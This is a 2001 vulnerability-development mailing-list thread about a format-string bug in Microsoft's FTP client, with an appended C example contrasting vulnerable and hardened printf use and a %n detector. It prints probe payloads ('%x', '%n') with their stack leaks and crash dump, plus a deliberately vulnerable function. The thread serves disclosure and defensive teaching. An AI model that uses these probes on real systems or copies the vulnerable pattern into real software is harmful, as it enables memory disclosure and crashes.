Vulnerability Development mailing list archives

Re: Microsoft FTP Program


From: "Eric D. Williams" <eric () INFOBRO COM>
Date: Fri, 23 Mar 2001 09:03:26 -0500

While this may work on newer versions of the FTP server (those that link to inetinfo), 
it seems older versions (3.51) are not vulnerable.  Interestingly, the output from 
the 500 response may be worth a little exploration, though.


220 server Windows NT FTP Server (Version 3.51).
230 Anonymous user logged in as ftp (guest access).
ftp> quote 0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x
500 '0x16382d0.0x16394d0.0x0.0x78257830.0x2578302e.0x78302e78.0x302e7825.0x2e782578': command not understood
ftp> quote %s
500 'ic?'': command not understood
ftp> quote %n
500 '': command not understood
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
.
..
pub
Security
users
226 Transfer complete.
39 bytes received in 0.00 seconds (39000.00 Kbytes/sec)
ftp> quit

Eric Williams, Pres.
Information Brokers, Inc.    Phone: +1 202.889.4395
http://www.infobro.com/        Fax: +1 202.889.4396
               mailto:eric () infobro com
           For More Info: info () infobro com
                    PGP Public Key
   http://new.infobro.com/KeyServ/EricDWilliams.asc
Finger Print: 1055 8AED 9783 2378 73EF  7B19 0544 A590 FF65 B789

On Wednesday, March 21, 2001 7:48 AM, SteeLe [SMTP:steeLe () PRIVACYX COM] wrote:
While playing around in the Microsoft FTP program that came with Windows 98, I
came across the following:

Connected to l33t host.
220 FTP server (Version 6.00LS) ready.
User (somewhere()): ftp
331 Guest login ok, send your email address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> quote
Command line to send
Usage: quote line to send.
ftp> quote 0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x
500 '0X7800BB4B.0X10072B8.0X1008820.0X0.0X56F3E8.0X78257830.0X2578302E.0X78302E78': command not understood.
ftp> quote %s
500 '+(|X+++YX++_ZX++|QX+++VX++ÇQX++êSX+++¦X++_ÄX++4òX+++òX++-
VX+++V
X+++VX+J_0___T__¦W_Y__T_Uï_QQVW+-¦XH': command not understood.
ftp> quote %n

And that crashed the program...

FTP caused an invalid page fault in
module KERNEL32.DLL at 0167:bff9d709.
Registers:
EAX=c00300f0 CS=0167 EIP=bff9d709 EFLGS=00010216
EBX=00000000 SS=016f ESP=0052feb8 EBP=00530154
ECX=00000000 DS=016f ESI=00690100 FS=1c2f
EDX=780376e8 ES=016f EDI=01001550 GS=0000
Bytes at CS:EIP:
53 8b 15 dc 9c fc bf 56 89 4d e4 57 89 4d dc 89
Stack dump:

I do know that the ftp program in most Linux distros had this problem a while
back, but who knew it would pass on to Windows.

Might not be important but someone should comment on this :)

SteeLe
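The behaviour both posts show (the `%x` leak and the `%n` crash after `quote`) is the classic format-string bug: the client hands the text typed after `quote` to a printf-family function as the format string rather than as an argument. The following C program is an added example written for this archive page; it is not the Windows or Linux ftp client's code, and the exact call the client makes is not on the page, so the vulnerable shape below is an assumption modelled on the posted output. It contrasts that shape with the hardened `"%s"` form, adds a simple pre-check that counts conversion specifiers and flags `%n`, and shows what `%n` does when it is given a legitimate pointer, which is why it faults when the pointer is whatever happens to be on the stack.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Count printf conversion specifiers in a string and flag %n.
 * A client could run this on the argument to 'quote' before it reaches
 * any printf-family call; the real fix, though, is reply_safe() below. */
int count_conversions(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')            /* "%%" is a literal percent sign */
            continue;
        /* skip flags, field width, precision and length modifiers */
        while (*p && strchr("-+ #0123456789.hlLqjzt", *p))
            p++;
        if (!*p)                  /* dangling '%' at end of string */
            break;
        count++;
        if (*p == 'n')
            *has_n = 1;
    }
    return count;
}

/* Convenience: 1 if the text contains a %n conversion, else 0. */
int has_percent_n(const char *s)
{
    int n;
    count_conversions(s, &n);
    return n;
}

/* Thin vsnprintf wrapper so both shapes below share one formatting path. */
static int format_into(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return r;
}

/* VULNERABLE shape (assumed from the thread's output): the user's text IS
 * the format string. "%x" then prints whatever the variadic slots hold,
 * and "%n" writes the byte count through a pointer read from one of them,
 * which is the invalid page fault in the original post. Only called with
 * benign input here. */
int reply_vulnerable(char *out, size_t outsz, const char *text)
{
    return format_into(out, outsz, text);
}

/* HARDENED shape: the format string is a constant and the user's text is
 * an argument, so "%x" and "%n" are copied as literal characters. */
int reply_safe(char *out, size_t outsz, const char *text)
{
    return format_into(out, outsz, "%s", text);
}

/* Returns 1 if reply_safe reproduces 'text' byte for byte. */
int safe_reply_is_literal(const char *text)
{
    char buf[128];
    reply_safe(buf, sizeof buf, text);
    return strcmp(buf, text) == 0;
}

/* What %n does with a legitimate argument: it stores the number of bytes
 * written so far through the int* it is given. Here the pointer is ours;
 * in the crash above it was an arbitrary stack value. Returns the count. */
int percent_n_demo(void)
{
    char buf[64];
    int written = -1;
    format_into(buf, sizeof buf, "%s%n", "USER ftp", &written);
    return written;
}

int main(void)
{
    int has_n;
    const char *probe = "0x%x.0x%x.0x%x.0x%x";   /* constructed sample input */
    printf("%s: %d conversions\n", probe, count_conversions(probe, &has_n));
    printf("\"%%n\" present in \"%%n\": %d\n", has_percent_n("%n"));
    printf("safe reply keeps literal text: %d\n", safe_reply_is_literal(probe));
    printf("%%n stored %d\n", percent_n_demo());
    return 0;
}
```

Build with `-Wall -Wformat-security`; note that the warning only fires when the compiler can see the non-literal format reach a printf-family call directly, so a wrapper like `format_into` without a `format` attribute hides the bug from the compiler as well, which is an argument for adding `__attribute__((format(printf, 3, 4)))` to such wrappers.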

